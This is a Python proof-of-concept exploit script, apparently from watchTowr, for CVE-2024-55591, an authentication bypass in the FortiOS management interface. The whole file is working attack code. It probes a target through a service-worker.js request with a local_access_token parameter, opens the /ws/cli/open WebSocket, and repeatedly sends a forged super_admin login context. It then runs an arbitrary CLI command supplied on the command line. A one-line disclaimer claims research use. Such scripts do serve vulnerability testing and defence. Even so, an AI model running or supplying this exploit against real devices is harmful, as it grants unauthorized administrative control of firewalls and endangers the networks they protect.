import socket # Disclaimer: For authorized security research and educational use only. import base64 import os import struct import ssl import argparse import requests import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) banner = """\ __ ___ ___________ __ _ ______ _/ |__ ____ | |_\\__ ____\\____ _ ________ \\ \\/ \\/ \\__ \\ ___/ ___\\| | \\\\| | / _ \\ \\/ \\/ \\_ __ \\ \\ / / __ \\| | \\ \\\\___| Y | |( <_> \\ / | | \\\n \\/\\_/ (____ |__| \\\\\\\___ |___|__|__ | \\\\__ / \\\/\\_/ |__| \\\ \\\ \\\ CVE-2024-55591.py (*) Fortinet FortiOS Authentication Bypass (CVE-2024-55591) POC by watchTowr - Sonny , watchTowr (sonny@watchTowr.com) CVEs: [CVE-2024-55591] """ helptext = """ Example Usage: - python CVE-2024-55591-PoC.py --host 192.168.1.5 --port 443 --command "get system status" --user watchTowr --ssl """ def create_websocket_frame(message, is_binary=False): """Create a WebSocket frame.""" data = message if isinstance(message, bytes) else message.encode() length = len(data) mask_key = os.urandom(4) frame = bytearray([0x82 if is_binary else 0x81]) if length < 126: frame.append(length | 0x80) elif length < 65536: frame.append(126 | 0x80) frame.extend(struct.pack('>H', length)) else: frame.append(127 | 0x80) frame.extend(struct.pack('>Q', length)) frame.extend(mask_key) masked_data = bytearray(length) for i in range(length): masked_data[i] = data[i] ^ mask_key[i % 4] frame.extend(masked_data) return frame def decode_websocket_frame(data): """Decode a WebSocket frame and extract the payload.""" if len(data) < 2: return None fin_and_opcode = data[0] opcode = fin_and_opcode & 0x0F payload_len = data[1] & 0x7F offset = 2 if payload_len == 126: payload_len = struct.unpack('>H', data[2:4])[0] offset = 4 elif payload_len == 127: payload_len = struct.unpack('>Q', data[2:10])[0] offset = 10 mask_key = data[offset:offset + 4] offset += 4 payload = data[offset:offset + payload_len] payload = bytes(b ^ mask_key[i % 4] for i, b in enumerate(payload)) return opcode, payload def send_login_context(): """Send the login message.""" login_message = f'"{args.user}" "admin" "watchTowr" "super_admin" "watchTowr" "watchTowr" [13.37.13.37]:1337 [13.37.13.37]:1337\r\n' s.send(create_websocket_frame(login_message)) rekt_message = f'\r\n{args.command}\r\n' s.send(create_websocket_frame(rekt_message)) def initialize_telnet_session(): """Initialize the Telnet session by sending commands in the correct order.""" # Step 1: Send Telnet negotiation commands # Step 2: Repeatedly send the login message brute_force = True while True: if brute_force: send_login_context() try: data = s.recv(4096) if data: # print(f"Raw received (hex): {data.hex()}") # Pipe the raw hex decoding directly to a human-readable string try: readable_output = bytes.fromhex(data.hex()).decode(errors='replace') if len(str(readable_output)) > 5: print(f"Output from server: {readable_output}") except Exception as e: print(f"Error decoding raw data to string: {e}") opcode, payload = decode_websocket_frame(data) if opcode == 0x8: # Close frame # print("Received close frame (8800), reconnecting.") return False # Trigger WebSocket reconnection elif opcode in [0x1, 0x2]: # Text or binary frame try: decoded_message = payload.decode(errors='replace') # print(f"Decoded payload message: {decoded_message}") except Exception as e: print(f"Error decoding payload: {e}") print(f"Raw payload (bytes): {payload}") if payload.strip(): # Stop brute force but keep listening # print("Received meaningful response. Stopping brute force and continuing to listen.") brute_force = False except ConnectionResetError: # print("Connection reset by peer. Reconnecting...") return False def pre_flight_checks(host, port, use_ssl): print('[*] Checking if target is a FortiOS Management interface') if use_ssl: forti_url = f"https://{host}:{port}" else: forti_url = f"http://{host}:{port}" is_forti = requests.get(forti_url+"/login?redir=/ng", verify=False, timeout=10) if '' not in is_forti.text: print('[*] Target is not a FortiOS Management interface, exiting...') exit() else: print ('[*] Target is confirmed as a FortiOS Management interface') bypass_check = requests.get(forti_url+"/service-worker.js?local_access_token=watchTowr", verify=False, timeout=10) if "api/v2/static" not in bypass_check.text: print('[*] Target is not vulnerable to CVE-2024-55591, exiting...') exit() else: print ('[*] Target is confirmed as vulnerable to CVE-2024-55591, proceeding with exploitation') def ws_connect_and_initialize(host, port, use_ssl): """Establish WebSocket connection and initialize the Telnet session.""" while True: ws_key = base64.b64encode(os.urandom(16)).decode() upgrade_request = ( f"GET /ws/cli/open?cols=162&rows=100&local_access_token=watchTowr HTTP/1.1\r\n" f"Host: {host}\r\n" f"Upgrade: websocket\r\n" f"Connection: Upgrade\r\n" f"Sec-WebSocket-Key: {ws_key}\r\n" f"Sec-WebSocket-Version: 13\r\n\r\n" ) global s s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) if use_ssl: context = ssl.create_default_context() context.minimum_version = ssl.TLSVersion.TLSv1_2 context.check_hostname = False # Allow self-signed certificates context.verify_mode = ssl.CERT_NONE # Disable certificate verification s = context.wrap_socket(s, server_hostname=host) try: s.connect((host, port)) s.send(upgrade_request.encode()) response = s.recv(4096) # print("Upgrade response:", response.decode()) # Immediately initialize the Telnet session if initialize_telnet_session(): break except ConnectionResetError: # print("Connection reset by peer during WebSocket setup. Retrying...") pass except Exception as e: # print(f"Unexpected error: {e}. Retrying...") pass if __name__ == "__main__": """ Main function to run the web interaction checks. """ parser = argparse.ArgumentParser(description='CVE-2024-55591 PoC') parser.add_argument("--command", type=str, default="get system info",help=" example 'get system status'") parser.add_argument("--user", type=str, default="watchTowr", help="Username value used in the crafted login context") parser.add_argument("--host", help="The IP address or hostname of the server",required=True) parser.add_argument("--port", type=int, help="The port number of the server", required=True) parser.add_argument("--ssl", action="store_true", help="Use SSL for the connection") try: print(banner) args = parser.parse_args() except: print(banner) print(helptext) exit() try: pre_flight_checks(args.host, args.port, args.ssl) except KeyboardInterrupt: print("Exiting...") try: ws_connect_and_initialize(args.host, args.port, args.ssl) except KeyboardInterrupt: print("Exiting...") finally: s.close()